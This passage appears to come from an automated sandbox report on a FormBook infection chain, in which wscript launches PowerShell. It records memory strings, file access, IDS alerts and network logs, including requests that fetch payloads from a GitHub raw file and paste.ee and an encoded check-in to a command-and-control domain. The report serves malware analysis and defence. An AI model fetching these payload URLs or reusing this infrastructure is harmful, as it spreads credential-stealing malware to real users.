Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: appidtel.pdbGCTL source: convert.exe, 00000013.00000002.2977602776.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.000000000259C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F20C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\convert.exe Code function: 4x nop then mov ebx, 00000004h 19_2_035604DE
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 4x nop then pop edi 24_2_04A194DF
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 4x nop then xor eax, eax 24_2_04A1D075
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 4x nop then pop edi 24_2_04A17BCC

Networking

Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49842 -> 188.114.96.3:443
Source: unknown DNS query: name: paste.ee
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: global traffic HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /d/SKF1O/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 199.59.243.227 199.59.243.227
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /6450/?EzrD=UbYh&mzEt0=52WN8KqJ7jnOEIaeyCxqWgP+KtwCoaIDn8AokGilDz2wl3Qo7VTMWMYazPgXvK5QOqLqt5Ti3xVPGgdXo5E4TqsbUcYSzSRqT9OtwmziQ+LYHZobMnJC5bEpbrqa7K8o2xX/TOE= HTTP/1.1Host: www.donante-de-ovulos.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-si; HTC_Desire_601 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: paste.ee
Source: global traffic DNS traffic detected: DNS query: www.donante-de-ovulos.biz
Source: powershell.exe, 00000008.00000002.2479829877.000001B5FF4CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: svchost.exe, 0000001B.00000002.3540546756.0000021B42E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.27.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.27.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.27.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.27.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.27.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.27.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.27.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.27.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.2445760088.000001B5F72E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://paste.ee
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8906000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000005.00000002.2347449551.000001F606841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2508706310.000001875DE91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E7271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E894F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000005.00000002.2347449551.000001F60688E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000005.00000002.2347449551.000001F6068A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2508706310.000001875DEBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2508706310.000001875DECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E7271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee;
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com;
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: edb.log.27.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000001B.00000003.2994764845.0000021B43050000.00000004.00000800.00020000.00000000.sdmp, edb.log.27.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.2350094223.000001F61E99F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: convert.exe, 00000013.00000002.2974673632.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: convert.exe, 00000013.00000003.2911076657.0000000007EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: convert.exe, 00000013.00000002.2974673632.0000000002F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_d
Source: convert.exe, 00000013.00000002.2974673632.0000000002F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: convert.exe, 00000013.00000002.2974673632.0000000002F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: convert.exe, 00000013.00000002.2974673632.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: convert.exe, 00000013.00000002.2974673632.0000000002F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: convert.exe, 00000013.00000002.2974673632.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: powershell.exe, 00000008.00000002.2445760088.000001B5F72E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E894F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E894F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/SKF1O/0
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7492000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E8611000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7492000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E8611000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txth3k;
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://themes.googleusercontent.com
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977602776.0000000004074000.00000004.10000000.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.0000000002984000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F5F4000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
